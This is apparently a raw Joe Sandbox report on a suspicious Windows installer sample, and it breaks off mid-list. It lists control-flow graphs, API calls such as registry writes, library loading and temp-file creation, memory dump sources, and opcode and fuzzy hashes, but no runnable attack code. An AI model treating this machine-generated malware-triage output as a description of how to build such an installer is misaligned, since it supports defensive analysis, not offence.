                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnum$DeleteValue
                                                                  • String ID:
                                                                  • API String ID: 1354259210-0
                                                                  • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                  • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                                  • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                  • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 559 73471817-73471856 call 73471bff 563 73471976-73471978 559->563 564 7347185c-73471860 559->564 565 73471862-73471868 call 7347243e 564->565 566 73471869-73471876 call 73472480 564->566 565->566 571 734718a6-734718ad 566->571 572 73471878-7347187d 566->572 573 734718af-734718cb call 73472655 call 73471654 call 73471312 GlobalFree 571->573 574 734718cd-734718d1 571->574 575 7347187f-73471880 572->575 576 73471898-7347189b 572->576 600 73471925-73471929 573->600 577 734718d3-7347191c call 73471666 call 73472655 574->577 578 7347191e-73471924 call 73472655 574->578 581 73471882-73471883 575->581 582 73471888-73471889 call 73472b98 575->582 576->571 579 7347189d-7347189e call 73472e23 576->579 577->600 578->600 594 734718a3 579->594 583 73471885-73471886 581->583 584 73471890-73471896 call 73472810 581->584 591 7347188e 582->591 583->571 583->582 599 734718a5 584->599 591->594 594->599 599->571 603 73471966-7347196d 600->603 604 7347192b-73471939 call 73472618 600->604 603->563 606 7347196f-73471970 GlobalFree 603->606 609 73471951-73471958 604->609 610 7347193b-7347193e 604->610 606->563 609->603 612 7347195a-73471965 call 734715dd 609->612 610->609 611 73471940-73471948 610->611 611->609 613 7347194a-7347194b FreeLibrary 611->613 612->603 613->609
                                                                  APIs
                                                                    • Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E74
                                                                    • Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E79
                                                                    • Part of subcall function 73471BFF: GlobalFree.KERNEL32(?), ref: 73471E7E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 734718C5
                                                                  • FreeLibrary.KERNEL32(?), ref: 7347194B
                                                                  • GlobalFree.KERNEL32(00000000), ref: 73471970
                                                                    • Part of subcall function 7347243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7347246F
                                                                    • Part of subcall function 73472810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73471896,00000000), ref: 734728E0
                                                                    • Part of subcall function 73471666: wsprintfW.USER32 ref: 73471694
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                  • String ID:
                                                                  • API String ID: 3962662361-3916222277
                                                                  • Opcode ID: c17f86ab42e2b129b5164586608726cb546139744062f98505920a9037d9a475
                                                                  • Instruction ID: 9a0ce559947c9a4ef43a99acdad2e4ef123c716e16f867b8ae827eef6ce64b24
                                                                  • Opcode Fuzzy Hash: c17f86ab42e2b129b5164586608726cb546139744062f98505920a9037d9a475
                                                                  • Instruction Fuzzy Hash: 9741B3B24003459FEB1D9F20D988BD537BCEF04350F184469E94BAA2D6DB78C085CB68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 616 401c48-401c68 call 402d89 * 2 621 401c74-401c78 616->621 622 401c6a-401c71 call 402dab 616->622 624 401c84-401c8a 621->624 625 401c7a-401c81 call 402dab 621->625 622->621 626 401cd8-401d02 call 402dab * 2 FindWindowExW 624->626 627 401c8c-401ca8 call 402d89 * 2 624->627 625->624 641 401d08 626->641 639 401cc8-401cd6 SendMessageW 627->639 640 401caa-401cc6 SendMessageTimeoutW 627->640 639->641 642 401d0b-401d0e 640->642 641->642 643 401d14 642->643 644 402c2f-402c3e 642->644 643->644
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                  • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                                  • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                  • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 647 4020dd-4020e9 648 4021a8-4021aa 647->648 649 4020ef-402105 call 402dab * 2 647->649 650 4022f6-4022fb call 401423 648->650 658 402115-402124 LoadLibraryExW 649->658 659 402107-402113 GetModuleHandleW 649->659 656 402c2f-402c3e 650->656 662 402126-402135 call 406ae5 658->662 663 4021a1-4021a3 658->663 659->658 659->662 666 402170-402175 call 405707 662->666 667 402137-40213d 662->667 663->650 672 40217a-40217d 666->672 669 402156-402169 call 73471817 667->669 670 40213f-40214b call 401423 667->670 674 40216b-40216e 669->674 670->672 679 40214d-402154 670->679 672->656 675 402183-40218d call 403cf4 672->675 674->672 675->656 680 402193-40219c FreeLibrary 675->680 679->672 680->656
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID: @f
                                                                  • API String ID: 334405425-729109391
                                                                  • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                  • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                                  • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                  • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 682 40248f-4024b6 call 402dab * 2 call 402e3b 688 4024bb-4024c0 682->688 689 4024c6-4024d0 688->689 690 402c2f-402c3e 688->690 691 4024d2-4024df call 402dab lstrlenW 689->691 692 4024e3-4024e6 689->692 691->692 696 4024e8-4024f9 call 402d89 692->696 697 4024fa-4024fd 692->697 696->697 698 40250e-402522 RegSetValueExW 697->698 699 4024ff-402509 call 403376 697->699 704 402524 698->704 705 402527-402608 RegCloseKey 698->705 699->698 704->705 705->690
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 00402602
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
                                                                  • API String ID: 2655323295-917692060
                                                                  • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                  • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                                  • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                  • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 707 4061a1-4061ad 708 4061ae-4061e2 GetTickCount GetTempFileNameW 707->708 709 4061f1-4061f3 708->709 710 4061e4-4061e6 708->710 712 4061eb-4061ee 709->712 710->708 711 4061e8 710->711 711->712
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004061BF
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-44229769
                                                                  • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                  • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                                  • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                  • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                                  APIs
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                    • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,00000000,000000F0), ref: 00401652
                                                                  Strings
                                                                  • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00401645
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
                                                                  • API String ID: 1892508949-3948318427
                                                                  • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                  • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                                  • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                  • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                  • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                                  • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                  • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                  • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                                  • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                  • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                  • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                                  • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                  • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                  • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                                  • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                  • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                  • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                                  • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                  • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
